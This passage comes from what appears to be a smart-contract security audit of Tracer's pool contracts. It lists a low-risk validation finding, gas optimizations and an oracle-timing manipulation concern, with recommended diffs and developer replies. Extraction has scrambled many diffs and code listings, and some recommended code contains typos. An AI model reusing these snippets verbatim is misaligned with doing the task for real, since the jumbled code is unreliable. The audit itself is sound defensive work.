MAX_MINTING_FEE; // so mintingFee is allowed to be 1e18 } } } Recommendation: • Initialize the values of mintingFee, burningFee and changeInterval in the constructor of the PoolFactory contract, or check in the deployPool() function that the values for mintingFee, burningFee, and changeIn- terval are set. • Double-check the maximum values of mintingFee, burningFee and changeInterval. • Check the value of _changeInterval in the initialize() function of the PoolCommitter contract. • Check the new values in setBurningFee(), setMintingFee() and setChangeInterval() functions of the PoolCommitter contract. • Replace 1e18 with PoolSwapLibrary.WAD_PRECISION Tracer: Disputed, as it is fine if we want 0 minting/burning fee and change interval. This is because the minting, burning, but most particularly the change interval, are things we want to experiment with in the real market and we want to be able to not use them if desired. Furthermore the PoolDeployment type captures the market creator’s desire for fees so this seems like a non-issue. As for the bounds on both minting and burning fees, the inconsistency in enforcement of the upper bounds is a defect but we have since capped the burning fee arbitrarily at 10%, so this seems to be an implicit mitigation. We don’t have a cap on what the minting fee can be. This was a decision made by our RnD. Spearbit: It might be helpful to add a comment to the definition of the mintingFee, burningFee and changeIn- terval variables, stating that a zero-value is also allowed. 23 Tracer: Addressed in PR 421. Spearbit: Acknowledged. +5.4.6 Committer not validated on withdraw claim and multi-paid claim Severity: Low Risk Context: AutoClaim.sol#L118, AutoClaim.sol#L136, AutoClaim.sol#L150 Description: AutoClaim checks that the committer creating the claim request in makePaidClaimRequest and withdrawing the claim request in withdrawUserClaimRequest is a valid committer for the PoolFactory used in theAutoClaim initializer. The same security check should be done in all the other functions where the committer is passed as a function parameter. Recommendation: A validity check should be added for the poolCommitter passed as a parameter, as it is done in scenarios where the msg.sender is the committer itself. function multiPaidClaimMultiplePoolCommitters(address[] calldata users, address[] calldata poolCommitterAddresses) external override ... for (uint256 i; i < users.length; i++) { require(poolFactory.isValidPoolCommitter(poolCommitterAddresses[i]), "poolCommitter not valid PoolCommitter"); ... } ... ,! { + ,! } function multiPaidClaimSinglePoolCommitter(address[] calldata users, address poolCommitterAddress) external override { + ,! } require(poolFactory.isValidPoolCommitter(poolCommitterAddress), "poolCommitter not valid PoolCommitter"); ... function withdrawClaimRequest(address poolCommitter) external override { + require(poolFactory.isValidPoolCommitter(poolCommitter), "poolCommitter not valid PoolCommitter"); .... } Tracer: We are trying to evaluate the benefits of this. In the case of multiPaidClaimMultiplePoolCommitters(), • More gas: this would be an extra check for every iteration • checkClaim() will return false, meaning nothing will happen when the claim() function is called • Correct implementations of the off-chain auto claiming bots will use correct data The same can be applied to multiPaidClaimSinglePoolCommitter(), but only one extra check would be required rather than in every iteration. We do not believe we should be doing on-chain stuff to cater for incorrect off-chain bot implementations. In the case of withdrawClaimRequest(), I’d be OK with adding this check. 24 Spearbit: It is less about catering for incorrect off-chain bots, but more about hardening security. We do not think it is immediately obvious why not checking the validity of the pool committers in these functions is not a security issue. You need to argue that: • Claim requests can only be made by and stored with valid pool committers as an index, so invalid pool committer rewards will always be zero. • An attacker-controlled pool committer argument does not lead to re-entrancy and other security issues in these functions. • Also, not checking it might be fine now, but not anymore with future code updates, and it is easy to forget that the pool committers are not checked for validity in all functions. Of course, it is up to you to decide if the additional security checks are worth the gas costs. You should at least document that you are deliberately not checking the validity here and state the above mentioned reasoning why it is not a security issue in the current code. Tracer: Claim requests can only be made by and stored with valid pool committers as an index, so invalid pool committer rewards will always be zero. We think this is already enforced by including the onlyPoolCommitter() modifier in makePaidClaimRequest(), so any subsequent claim attempts will only have claim requests that are populated with non-zero data if it was a pool committer deployed by the factory. An attacker-controlled pool committer argument does not lead to re-entrancy and other security issues in these functions We believe this should always hold due to the checkClaim() call in the multiPaidClaimMultiplePoolCommit- ters() and multiPaidClaimSinglePoolCommitter() functions. Also, not checking it might be fine now, but not anymore with future code updates, and it is easy to forget that the pool committers are not checked for validity in all functions. This is definitely a good point and we would be happy to add these checks for this reason. Addressed in issue 359. Spearbit: Acknowledged. 5.5 Gas Optimization +5.5.1 Some SMAOracle and AutoClaim state variables can be declared as immutable Severity: Gas Optimization Context: SMAOracle.sol#L8-L26, AutoClaim.sol#L18 Description: In the SMAOracle contract, the oracle, periods, observer, scaler and updateInterval state vari- ables are not declared as immutable. In the AutoClaim contract, the poolFactory state variable is not declared as immutable. Since the mentioned variables are only initialized in the contracts’ constructors, they can be declared as immutable in order to save gas. Recommendation: Declare mentioned variables as immutable. 25 contract SMAOracle is IOracleWrapper { /// Price oracle supplying the spot price of the quote asset address public override oracle; address public immutable override oracle; ... /// Price observer providing the SMA oracle with historical pricing data address public observer; address public immutable observer; /// Number of periods to use in calculating the SMA (`k` in the SMA equation) uint256 public periods; uint256 public immutable periods; ... /// Duration between price updates uint256 public updateInterval; uint256 public immutable updateInterval; int256 public scaler; int256 public immutable scaler; ... - + - + - + - + - + } contract AutoClaim is IAutoClaim { ... IPoolFactory internal poolFactory; IPoolFactory internal immutable poolFactory; ... - + } Tracer: We are submitting PR 406 as a mitigation for this. It is a slightly larger PR than we originally intended so as a result it will likely be submitted for several defects here. We would appreciate if each defect could be assessed against it. Spearbit: Correctly changed to immutable, except for AutoClaim, which is not part of PR 406. Tracer: Good point. Addressed in PR 429. +5.5.2 Use of counters can be optimized Severity: Gas Optimization Context: PoolCommitter.sol#L504-L522 Description: counter and i are both used as counters for the same loop. uint32 counter = 1; uint256 i = 0; ... while (i < upperBound) { ... unchecked { counter += 1; } i++; } Recommendation: Keep only one counter. 26 - uint32 counter = 1; + uint256 counter = 1; - uint256 i = 0; ... - while (i < upperBound) { + while (counter <= upperBound) { ... - } i++ Tracer: This has already been addressed as part of one of the CARE programs. The current state of the function can be seen at PoolCommitter.sol#L481 Spearbit: The double counter issues have been fixed. Note: _updateIntervalId is assigned but is not used in PoolCommitter.sol#L517 Note: The bounded loop has been replaced by an unbounded loop in PoolCommitter.sol#L514, which introduces the risk of the function running out of gas. +5.5.3 transferOwnership() function is inaccessible Severity: Gas Optimization Context: ERC20_Cloneable.sol#L89-L92 Description: The ERC20_Cloneable contract contains a transferOwnership() function that may only be called by the owner, which is PoolFactory. However PoolFactory doesn’t call the function so it is essentially dead code, making the deployment cost unnecessary additional gas. function transferOwnership(address _owner) external onlyOwner { require(_owner != address(0), "Owner: setting to 0 address"); owner = _owner; } Recommendation: Double-check if there is any use for the transferOwnership() function. If so, make it acces- sible, otherwise remove the function. Tracer: Valid, will fix. +5.5.4 Use cached values when present Severity: Gas Optimization Context: PoolCommitter.sol#L609-L632 Description: The updateAggregateBalance() function creates a temporary variable id with the value currentIn- Immediately after that, currentIntervalIds[i] is used again. This could be replaced by id to tervalIds[i]. save gas. function updateAggregateBalance(address user) public override checkInvariantsAfterFunction { ... for (uint256 i = 0; i < unAggregatedLength; i++) { uint256 id = currentIntervalIds[i]; if (currentIntervalIds[i] == 0) { // could use id continue; } Recommendation: Code should be changed to: 27 function updateAggregateBalance(address user) public override checkInvariantsAfterFunction { ... - + } uint256 id = currentIntervalIds[i]; if (currentIntervalIds[i] == 0) { if (id == 0) { Tracer: Valid, fixed in PR 330. +5.5.5 _invariantCheckContract stored twice Severity: Gas Optimization Context: PoolCommitter.sol, LeveragedPool.sol Description: Both the PoolCommitter and LeveragedPool contracts store the value of _invariantCheckContract twice, both in invariantCheckContract and invariantCheck. This is not necessary and costs extra gas. contract PoolCommitter is IPoolCommitter, Initializable { ... address public invariantCheckContract; IInvariantCheck public invariantCheck; ... function initialize( ..., address _invariantCheckContract, ... ) external override initializer { ... invariantCheckContract = _invariantCheckContract; invariantCheck = IInvariantCheck(_invariantCheckContract); ... } } contract LeveragedPool is ILeveragedPool, Initializable, IPausable { ... address public invariantCheckContract; IInvariantCheck public invariantCheck; ... function initialize(ILeveragedPool.Initialization calldata initialization) external override initializer { ,! ... invariantCheckContract = initialization._invariantCheckContract; invariantCheck = IInvariantCheck(initialization._invariantCheckContract); } } Recommendation: Store the value of _invariantCheckContract once and use typecasts to convert it to the required type. Tracer: Valid, fixed by PR 398. 28 +5.5.6 Unnecessary if/else statement in LeveragedPool Severity: Gas Optimization Context: LeveragedPool.sol#L352 Description: A boolean variable is used to indicate the type of token to mint. The if/else statement can be avoided by using LONG_INDEX or SHORT_INDEX as the parameter instead of a bool to indicate the use of long or short token. uint256 public constant LONG_INDEX = 0; uint256 public constant SHORT_INDEX = 1; ... function mintTokens(bool isLongToken,...){ if (isLongToken) { IPoolToken(tokens[LONG_INDEX]).mint(...); } else { IPoolToken(tokens[SHORT_INDEX]).mint(...); ... Recommendation: The bool isLongToken parameter should be replaced by uint256 tokenType, and the if/else statement should be removed. Note: uint8 tokenType might be even more efficient on Arbitrum. if (isLongToken) { IPoolToken(tokens[LONG_INDEX]).mint(...); - function mintTokens(bool isLongToken, ...){ + function mintTokens(uint256 tokenType, ...){ - - + - - ... IPoolToken(tokens[tokenType]).mint(...); IPoolToken(tokens[SHORT_INDEX]).mint(...); } else { Tracer: Valid, fixed in PR 338. +5.5.7 Uncached array length used in loop Severity: Gas Optimization Context: AutoClaim.sol#L115 Description: The users array length is used in a for loop condition, therefore the length of the array is evaluated in every loop iteration. Evaluating it once and caching it can save gas. for (uint256 i; i < users.length; i++) { ... } Recommendation: Code should be changed to: - for (uint256 i; i < users.length; i++) { + uint256 nrUsers = user.length; + for (uint256 i; i < nrUsers; i++) { Tracer: Valid, fixed in PR 331. 29 +5.5.8 Unnecessary deletion of array elements in a loop is expensive Severity: Gas Optimization Context: PoolCommitter.sol#L653 Description: The unAggregatedCommitments[user] array is deleted after the for loop in updateAggregateBal- ance. Therefore, deleting the array elements one by one with delete unAggregatedCommitments[user][i]; in the loop body costs unnecessary gas. Recommendation: Array element deletions in the loop should be removed. function updateAggregateBalance(address user) public override checkInvariantsAfterFunction { ... for (uint256 i = 0; i < unAggregatedLength; i++) { ... if (commitment.updateIntervalId < updateIntervalId) { ... delete unAggregatedCommitments[user][i]; } else { ... } } delete unAggregatedCommitments[user]; ... - } Tracer: Valid, fixed in PR 385. +5.5.9 Zero-value transfers are allowed Severity: Gas Optimization Context: AutoClaim.sol#L77 Description: Given that claim() can return 0 when the claim isn’t valid yet due to updateInterval, the return value should be checked to avoid doing an unnecessary sendValue() call with amount 0. Address.sendValue( payable(msg.sender), claim(user, poolCommitterAddress, poolCommitter, currentUpdateIntervalId) ); Recommendation: A check should be added to ensure the amount to transfer is greater than 0 before calling Address.sendValue(). Tracer: Valid, fixed in PR 382. 30 +5.5.10 Unneeded onlyUnpaused modifier in setQuoteAndPool() Severity: Gas Optimization Context: PoolCommitter.sol#L776 Description: The setQuoteAndPool() function is only callable once, from the factory contract during deployment, due to the onlyFactory modifier. During this call, the contract is always unpaused, therefore the onlyUnpaused modifier is not necessary. Recommendation: The onlyUnpaused modifier should be removed. - function setQuoteAndPool(address _quoteToken, address _leveragedPool) external override onlyFactory onlyUnpaused { ,! + function setQuoteAndPool(address _quoteToken, address _leveragedPool) external override onlyFactory { Tracer: Valid, will fix. +5.5.11 Unnecessary mapping access in AutoClaim.makePaidClaimRequest() Severity: Gas Optimization Context: AutoClaim.sol#L46-L62 Description: Resolving mappings consumes more gas than directly accessing the storage struct, therefore it’s more gas-efficient to use the already de-referenced variable than to resolve the mapping again. function makePaidClaimRequest(address user) external payable override onlyPoolCommitter { ClaimRequest storage request = claimRequests[user][msg.sender]; ... uint256 reward = claimRequests[user][msg.sender].reward; ... claimRequests[user][msg.sender].updateIntervalId = requestUpdateIntervalId; claimRequests[user][msg.sender].reward = msg.value; Recommendation: claimRequests[user][msg.sender] should be replaced by request. - uint256 reward = claimRequests[user][msg.sender].reward; + uint256 reward = request.reward; ... - claimRequests[user][msg.sender].updateIntervalId = requestUpdateIntervalId; + request.updateIntervalId = requestUpdateIntervalId; - claimRequests[user][msg.sender].reward = msg.value; + request.reward = msg.value; Tracer: Valid, fixed in PR 397. +5.5.12 Function complexity can be reduced from linear to constant by rewriting loops Severity: Gas Optimization Context: PriceObserver.sol#L71-L88, PriceObserver.sol#L130-L146, SMAOracle.sol#L110-L142 Description: The add() function of the PriceObserver contract shifts an entire array if the buffer is full, and the SMA() function of the SMAOracle contract sums the values of an array to calculate its average. Both of these functions have O(n) complexity and could be rewritten to have O(1) complexity. This would save gas and possibly increase the buffer size. 31 contract PriceObserver is Ownable, IPriceObserver { ... * @dev If the backing array is full (i.e., `length() == capacity()`, then * it is rotated such that the oldest price observation is deleted function add(int256 x) external override onlyWriter returns (bool) { ... if (full()) { leftRotateWithPad(x); ... } function leftRotateWithPad(int256 x) private { uint256 n = length(); /* linear scan over the [1, n] subsequence */ for (uint256 i = 1; i < n; i++) { observations[i - 1] = observations[i]; } ... } contract SMAOracle is IOracleWrapper { * @dev O(k) complexity due to linear traversal of the final `k` elements of `xs` ... function SMA(int256[24] memory xs, uint256 n, uint256 k) public pure returns (int256) { ... /* linear scan over the [n - k, n] subsequence */ for (uint256 i = n - k; i < n; i++) { S += xs[i]; } ... } } Recommendation: A circular buffer should be used, like other protocols do. This reduces the complexity of the functions to O(1). Note: This is also suggested in Runtime verification report: B14 PriceObserver - potential gas optimization Keeping the sum of the last k (periods) elements of observations should be considered. should be used to add an element to the array: In this case, this code sum = sum + latest added element - element [buffer length-k] Then the average of the last k elements can be calculated by dividing the sum by k. Note: this requires a tighter integration between SMAOracle and PriceObserver. Tracer: We are wondering if PriceObserver is needed. The initial motivation was to support potentially multiple "thin" oracles (e.g. EMAOracle, etc.) that apply some very simple transformations to the underlying spot price observations. However, 1. It is currently unclear if this is even a product necessity 2. It adds complexity The question then is do you consider PriceObserver’s existence justified? Regardless of the answer to this question, it is pretty clear that SMAOracle needs to be refactored to capture asymptotic complexity bounds. Spearbit: Agreed, the PriceObserver is tightly coupled to its writer, which is the only contract that can decide when it is updated. There is an implicit updateInterval and token pair dependency in the PriceObserver already which restricts reusing it to "thin oracles" that operate on the same values. 32 Currently, we would say that the existence of PriceObserver is not justified, and it could just be an abstract contract that SMAOracle inherits. It really depends on how likely it is that there will be other "thin oracle wrappers" in the future and if these will be operating on the same tokens and update intervals. Even in that case, as the observer has only one writer, it will not work well with multiple thin oracles. This is because if two oracles use the same observer, you need to decide which one is the writer and communicate to the other that it shall not write. You may need multiple writers, but they do not know when the last update to the observer occurred, and you risk writing to it several times before the update interval passed. So we do not think it is reusable in its current form and does not need to exist or be deployed on its own. Tracer: We are submitting PR 406 as a mitigation for this. It is a slightly larger PR than we originally intended so as a result it will likely be submitted for several defects here. We would appreciate if each defect could be assessed against it. Spearbit: PriceObserver.sol is removed and an alternative way is found to store prices without shifting. Note: _calculateSMA() is still O(n). +5.5.13 Unused observer state variable in PoolKeeper Severity: Gas Optimization Context: PoolKeeper.sol#L37 Description: There is no use for the observer state variable. It is only used in performUpkeepSinglePool in a require statement to check if is set. address public observer; function setPriceObserver(address _observer) external onlyOwner { ... observer = _observer; ... function performUpkeepSinglePool(...) require(observer != address(0), "Observer not initialized"); ... Recommendation: The observer state variable should be removed, along with the setter function and the re- quire statement in performUpkeepSinglePool. Tracer: Valid, fixed in PR 273. +5.5.14 Usage of temporary variable instead of type casting in PoolKeeper.performUpkeepSinglePool() Severity: Gas Optimization Context: PoolKeeper.sol#L132 Description: The pool temporary variable is used to cast the address to ILeveragedPool. Casting the address directly where the pool variable is used saves gas, as _pool is calldata. Recommendation: A direct typecast from _pool should be used instead of a temporary variable. - ILeveragedPool pool = ILeveragedPool(_pool); ... - IOracleWrapper poolOracleWrapper = IOracleWrapper(pool.oracleWrapper()); + IOracleWrapper poolOracleWrapper = IOracleWrapper( ILeveragedPool(_pool).oracleWrapper() ); ... - try pool.poolUpkeep(...) + try ILeveragedPool(_pool).poolUpkeep(...) Tracer: Valid, addressed in issue 365. 33 +5.5.15 Events and event emissions can be optimized Severity: Gas Optimization Context: PoolCommitter.sol#L151, PoolCommitter.sol#L776-L783, PoolFactory.sol#L164 Description: PoolFactory.deployPool() would result in: Having a single DeployCommitter event to be emitted after setQuoteAndPool() in 1. Having better UX/event tracking and alignment with the current behavior to emit events during the Factory deployment. 2. Removing the QuoteAndPoolChanged event that is emitted only once during the lifetime of the PoolCommitter during PoolFactory.deployPool(). 3. Removing the ChangeIntervalSet emission in PoolCommitter.initialize(). The changeInterval has not really changed, it was initialized. This can be tracked by the DeployCommitter event. Recommendation: A DeployCommitter event emission should be added after the setQuoteAndPool() call in PoolFactory.deployPool(). That specific event should track the parameters that need to be tracked and the ones previously tracked by ChangeIntervalSet and QuoteAndPoolChanged. function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) { ... // approve the quote token on the pool commiter to finalise linking // this also stores the pool address in the commiter IPoolCommitter(poolCommitterAddress).setQuoteAndPool(deploymentParameters.quoteToken, _pool); emit DeployCommitter(eploymentParameters.quoteToken, _pool, changeInterval); ... + } QuoteAndPoolChanged event emission should be removed from PoolCommitter.setQuoteAndPool() along with the _quoteToken parameter and the check on _quoteToken. This last parameter will always be different to ad- dress(0), because it was already checked in the LeveragedPool initialization. function setQuoteAndPool(address _quoteToken, address _leveragedPool) external override onlyFactory onlyUnpaused { require(_quoteToken != address(0), "Quote token address cannot be 0 address"); require(_leveragedPool != address(0), "Leveraged pool address cannot be 0 address"); leveragedPool = _leveragedPool; tokens = ILeveragedPool(leveragedPool).poolTokens(); emit QuoteAndPoolChanged(_quoteToken, _leveragedPool); ,! - - } The QuoteAndPoolChanged event should be removed, as it won’t be used considering setQuoteAndPool() is only called by the Factory at deploy time. The method name should be changed to initQuoteAndPool() to be more precise with the real meaning. NatSpec comments should be updated accordingly. ChangeIntervalSet event emission should be removed from PoolCommitter.initialize(). 34 function initialize( address _factory, address _invariantCheckContract, address _autoClaim, address _factoryOwner, uint256 _mintingFee, uint256 _burningFee, uint256 _changeInterval ) external override initializer { ... emit ChangeIntervalSet(_changeInterval); ... - } Tracer: Valid, addressed in PR 395. +5.5.16 Multi-paid claim rewards should be sent only if nonzero Severity: Gas Optimization Context: AutoClaim.sol#L122, AutoClaim.sol#L141 Description: In both multiPaidClaimMultiplePoolCommitters() and multiPaidClaimSinglePoolCommitter(), there could be cases where the reward sent back to the claimer is zero. In these scenarios, the reward value should be checked to avoid wasting gas. Recommendation: The reward should be sent back to msg.sender only if it is nonzero. The check is necessary even if the Tracer team adds a check on msg.value (PoolCommitter.sol#L312-L314) because claimers could claim nonexistent commits or commits that have already been claimed. function multiPaidClaimMultiplePoolCommitters(address[] calldata users, address[] calldata ,! poolCommitterAddresses) external override { - + + + } ... Address.sendValue(payable(msg.sender), reward); if (reward != 0) { Address.sendValue(payable(msg.sender), reward); } function multiPaidClaimSinglePoolCommitter(address[] calldata users, address poolCommitterAddress) external override ... Address.sendValue(payable(msg.sender), reward); if (reward != 0) { Address.sendValue(payable(msg.sender), reward); } { - + + + } Tracer: Valid, fixed in PR 382. 35 +5.5.17 Unnecessary quad arithmetic use where integer arithmetic works Severity: Gas Optimization Context: PoolSwapLibrary.sol#L331, PoolKeeper.sol#L245-L261 Description: The ABDKMathQuad library is used to compute a division which is then truncated with toUint(). Semantically this is equivalent to a standard uint division, which is more gas efficient. The same library is also unnecessarily used to compute keeper’s reward. This can be safely done by using standard uint computation. function appropriateUpdateIntervalId(...) ... uint256 factorDifference = ABDKMathQuad.toUInt(divUInt(frontRunningInterval, updateInterval)); function keeperReward(...) ... int256 wadRewardValue = ABDKMathQuad.toInt( ABDKMathQuad.add( ABDKMathQuad.fromUInt(_keeperGas), ABDKMathQuad.div( ( ABDKMathQuad.div( (ABDKMathQuad.mul(ABDKMathQuad.fromUInt(_keeperGas), _tipPercent)), ABDKMathQuad.fromUInt(100) ) ), FIXED_POINT ) ) ); uint256 decimals = IERC20DecimalsWrapper(ILeveragedPool(_pool).quoteToken()).decimals(); uint256 deWadifiedReward = PoolSwapLibrary.fromWad(uint256(wadRewardValue), decimals); Recommendation: ABDKMathQuad should be replaced with standard uint computation where possible. Tracer: Valid, addressed in PR 391. +5.5.18 Custom errors should be used Severity: Gas Optimization Context: Contracts Description: In the latest Solidity versions it is possible to replace the strings used to encode error messages with custom errors, which are more gas efficient. AutoClaim.sol: PoolCommitter"); ,! AutoClaim.sol: AutoClaim.sol: PoolCommitter"); ,! AutoClaim.sol: require(poolFactory.isValidPoolCommitter(msg.sender), "msg.sender not valid require(_poolFactoryAddress != address(0), "PoolFactory address == 0"); require(poolFactory.isValidPoolCommitter(poolCommitterAddress), "Invalid require(users.length == poolCommitterAddresses.length, "Supplied arrays must be same length"); ,! ChainlinkOracleWrapper.sol: require(_oracle != address(0), "Oracle cannot be 0 address"); ChainlinkOracleWrapper.sol: require(_deployer != address(0), "Deployer cannot be 0 address"); ChainlinkOracleWrapper.sol: require(_decimals <= MAX_DECIMALS, "COA: too many decimals"); ChainlinkOracleWrapper.sol: require(answeredInRound >= roundID, "COA: Stale answer"); ChainlinkOracleWrapper.sol: require(timeStamp != 0, "COA: Round incomplete"); ERC20_Cloneable.sol: ERC20_Cloneable.sol: InvariantCheck.sol: InvariantCheck.sol: LeveragedPool.sol: require(msg.sender == owner, "msg.sender not owner"); require(_owner != address(0), "Owner: setting to 0 address"); require(_factory != address(0), "Factory address cannot be null"); require(poolFactory.isValidPool(poolToCheck), "Pool is invalid"); require(!paused, "Pool is paused"); 36 LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: require(!paused, "Pool is paused"); require(!paused, "Pool is paused"); require(msg.sender == keeper, "msg.sender not keeper"); require(msg.sender == invariantCheckContract, "msg.sender not invariantCheckContract"); ,! LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: address"); ,! LeveragedPool.sol: address"); ,! LeveragedPool.sol: be 0 address"); ,! LeveragedPool.sol: cannot be 0 address"); ,! LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: address"); ,! LeveragedPool.sol: address"); ,! LeveragedPool.sol: be 0 address"); ,! LeveragedPool.sol: require(msg.sender == poolCommitter, "msg.sender not poolCommitter"); require(msg.sender == governance, "msg.sender not governance"); require(initialization._feeAddress != address(0), "Fee address cannot be 0 require(initialization._quoteToken != address(0), "Quote token cannot be 0 require(initialization._oracleWrapper != address(0), "Oracle wrapper cannot require(initialization._settlementEthOracle != address(0), "Keeper oracle require(initialization._owner != address(0), "Owner cannot be 0 address"); require(initialization._keeper != address(0), "Keeper cannot be 0 address"); require(initialization._longToken != address(0), "Long token cannot be 0 require(initialization._shortToken != address(0), "Short token cannot be 0 require(initialization._poolCommitter != address(0), "PoolCommitter cannot require(initialization._invariantCheckContract != address(0), "InvariantCheck cannot be 0 address"); require(initialization._fee < PoolSwapLibrary.WAD_PRECISION, "Fee >= 100%"); require(initialization._secondaryFeeSplitPercent <= 100, "Secondary fee split cannot exceed 100%"); as old governance address"); ,! LeveragedPool.sol: LeveragedPool.sol: ,! LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: ,! LeveragedPool.sol: address"); ,! LeveragedPool.sol: LeveragedPool.sol: LeveragedPool.sol: PoolCommitter.sol: PoolCommitter.sol: PoolCommitter.sol: PoolCommitter.sol: PoolCommitter.sol: PoolCommitter.sol: ,! PoolCommitter.sol: PoolCommitter.sol: PoolCommitter.sol: ,! PoolCommitter.sol: PoolCommitter.sol: invariantCheckContract"); require(initialization._updateInterval != 0, "Update interval cannot be 0"); require(intervalPassed(), "Update interval hasn't passed"); require(account != address(0), "Account cannot be 0 address"); require(msg.sender == _oldSecondaryFeeAddress); require(_keeper != address(0), "Keeper address cannot be 0 address"); require(_governance != governance, "New governance address cannot be same require(_governance != address(0), "Governance address cannot be 0 require(governanceTransferInProgress, "No governance change active"); require(msg.sender == _provisionalGovernance, "Not provisional governor"); require(paused, "Pool is live"); require(!paused, "Pool is paused"); require(msg.sender == governance, "msg.sender not governance"); require(!paused, "Pool is paused"); require(!paused, "Pool is paused"); require(!paused, "Pool is paused"); require(msg.sender == invariantCheckContract, "msg.sender not require(msg.sender == factory, "Committer: not factory"); require(msg.sender == leveragedPool, "msg.sender not leveragedPool"); require(msg.sender == user || msg.sender == address(autoClaim), "msg.sender not committer or AutoClaim"); require(_factory != address(0), "Factory address cannot be 0 address"); require(_invariantCheckContract != address(0), "InvariantCheck address cannot be 0 address"); ,! PoolCommitter.sol: PoolCommitter.sol: PoolCommitter.sol: PoolCommitter.sol: require(_autoClaim != address(0), "AutoClaim address cannot be null"); require(_mintingFee < PoolSwapLibrary.WAD_PRECISION, "Minting fee >= 100%"); require(_burningFee < PoolSwapLibrary.WAD_PRECISION, "Burning fee >= 100%"); require(userCommit.balanceLongBurnAmount <= balance.longTokens, "Insufficient pool tokens"); ,! PoolCommitter.sol: require(userCommit.balanceShortBurnAmount <= balance.shortTokens, ,! "Insufficient pool tokens"); 37 ,! PoolCommitter.sol: PoolCommitter.sol: address"); ,! PoolCommitter.sol: address"); ,! PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: ,! PoolFactory.sol: ,! PoolFactory.sol: ,! PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolFactory.sol: PoolKeeper.sol: PoolKeeper.sol: PoolKeeper.sol: PoolKeeper.sol: PoolKeeper.sol: PoolSwapLibrary.sol: PoolSwapLibrary.sol: PoolSwapLibrary.sol: PoolSwapLibrary.sol: PriceObserver.sol: PriceObserver.sol: PriceObserver.sol: SMAOracle.sol: ,! SMAOracle.sol: PoolCommitter.sol: require(userCommit.balanceLongBurnMintAmount <= balance.longTokens, "Insufficient pool tokens"); ,! PoolCommitter.sol: require(userCommit.balanceShortBurnMintAmount <= balance.shortTokens, "Insufficient pool tokens"); require(amount > 0, "Amount must not be zero"); require(_quoteToken != address(0), "Quote token address cannot be 0 require(_leveragedPool != address(0), "Leveraged pool address cannot be 0 require(_feeReceiver != address(0), "Address cannot be null"); require(_poolKeeper != address(0), "PoolKeeper not set"); require(autoClaim != address(0), "AutoClaim not set"); require(invariantCheck != address(0), "InvariantCheck not set"); require(IOracleWrapper(deploymentParameters.oracleWrapper).deployer() == msg.sender,"Deployer must be oracle wrapper owner"); require(deploymentParameters.leverageAmount >= 1 && deploymentParameters.leverageAmount <= maxLeverage,"PoolKeeper: leveraged amount invalid"); require(IERC20DecimalsWrapper(deploymentParameters.quoteToken).decimals() <= MAX_DECIMALS,"Decimal precision too high"); require(_poolKeeper != address(0), "address cannot be null"); require(_invariantCheck != address(0), "address cannot be null"); require(_autoClaim != address(0), "address cannot be null"); require(newMaxLeverage > 0, "Maximum leverage must be non-zero"); require(_feeReceiver != address(0), "address cannot be null"); require(newFeePercent <= 100, "Secondary fee split cannot exceed 100%"); require(_fee <= 0.1e18, "Fee cannot be > 10%"); require(_mintingFee <= 1e18, "Fee cannot be > 100%"); require(_burningFee <= 1e18, "Fee cannot be > 100%"); require(_changeInterval <= 1e18, "Change interval cannot be > 100%"); require(msg.sender == address(factory), "Caller not factory"); require(_factory != address(0), "Factory cannot be 0 address"); require(_observer != address(0), "Price observer cannot be 0 address"); require(firstPrice > 0, "First price is non-positive"); require(observer != address(0), "Observer not initialized"); require(timestamp >= lastPriceTimestamp, "timestamp in the past"); require(price != 0, "price == 0"); require(price != 0, "price == 0"); require(price != 0, "price == 0"); require(msg.sender == writer, "PO: Permission denied"); require(i < length(), "PO: Out of bounds"); require(_writer != address(0), "PO: Null address not allowed"); require(_spotOracle != address(0) && _observer != address(0) && _deployer require(_periods > 0 && _periods <= IPriceObserver(_observer).capacity(), require(_spotDecimals <= MAX_DECIMALS, "SMA: Decimal precision too high"); require(_updateInterval != 0, "Update interval cannot be 0"); require(block.timestamp >= lastUpdate + updateInterval, "SMA: Too early to require(k > 0 && k <= n && k <= uint256(type(int256).max), "SMA: Out of != address(0),"SMA: Null address forbidden"); "SMA: Out of bounds"); ,! SMAOracle.sol: SMAOracle.sol: SMAOracle.sol: update"); ,! SMAOracle.sol: ,! bounds"); Recommendation: The use of custom error messages should be considered, as explained on the Solidity Lan- guage Blog. Tracer: Solidity currently doesn’t support custom errors very well. The official advice is to convert all requires into conditionals manually but we think this severely harms code readability for virtually no gain. Spearbit: There is no problem leaving the code as it is. 38 5.6 Informational +5.6.1 Different updateIntervals in SMAOracle and pools Severity: Informational Context: LeveragedPool, SMAOracle Description: The updateIntervals for the pools and the SMAOracles are different. If the updateInterval for SMAOracle is larger than the updateInterval for poolUpkeep(), then the oracle price update could happen directly after the poolUpkeep(). It is possible to perform permissionless calls to poll(). In combination with a delayed poolUpkeep() an attacker could manipulate the timing of the SMAOracle price, because after a call to poll() it can’t be called again until updateInterval has passed. contract LeveragedPool is ILeveragedPool, Initializable, IPausable { function initialize(ILeveragedPool.Initialization calldata initialization) external override initializer { ,! ... updateInterval = initialization._updateInterval; ... } function poolUpkeep(... ) external override onlyKeeper { require(intervalPassed(), "Update interval hasn't passed"); ... } function intervalPassed() public view override returns (bool) { unchecked { return block.timestamp >= lastPriceTimestamp + updateInterval; } } contract SMAOracle is IOracleWrapper { constructor(..., uint256 _updateInterval, ... ) { updateInterval = _updateInterval; } function poll() external override returns (int256) { require(block.timestamp >= lastUpdate + updateInterval, "SMA: Too early to update"); return update(); } } Recommendation: SMAOracle’s updateInterval should be shorter than poolUpkeep()’s updateInterval, but not too short to prevent SMA buffer rotations in-between poolUpkeep() calls. Tracer: We think the safest option is to enforce strict equality between the intervals: semantically they are basically the same thing and we do not see any added value in allowing them to be separate concepts. Spearbit: Note though that from the pool’s perspective the oracleWrapper is specified by the deployer and as such does not have control or guarantee over the SMAOracle’s updateInterval or over its impact on the price calculation. Tracer: Presumably the deployer enforces this invariant, but oracle risk remains on deployers as per our threat model regardless. With this being said, we think we should try and develop a safer alternative to avoid errors due to negligence. 39 +5.6.2 Tight 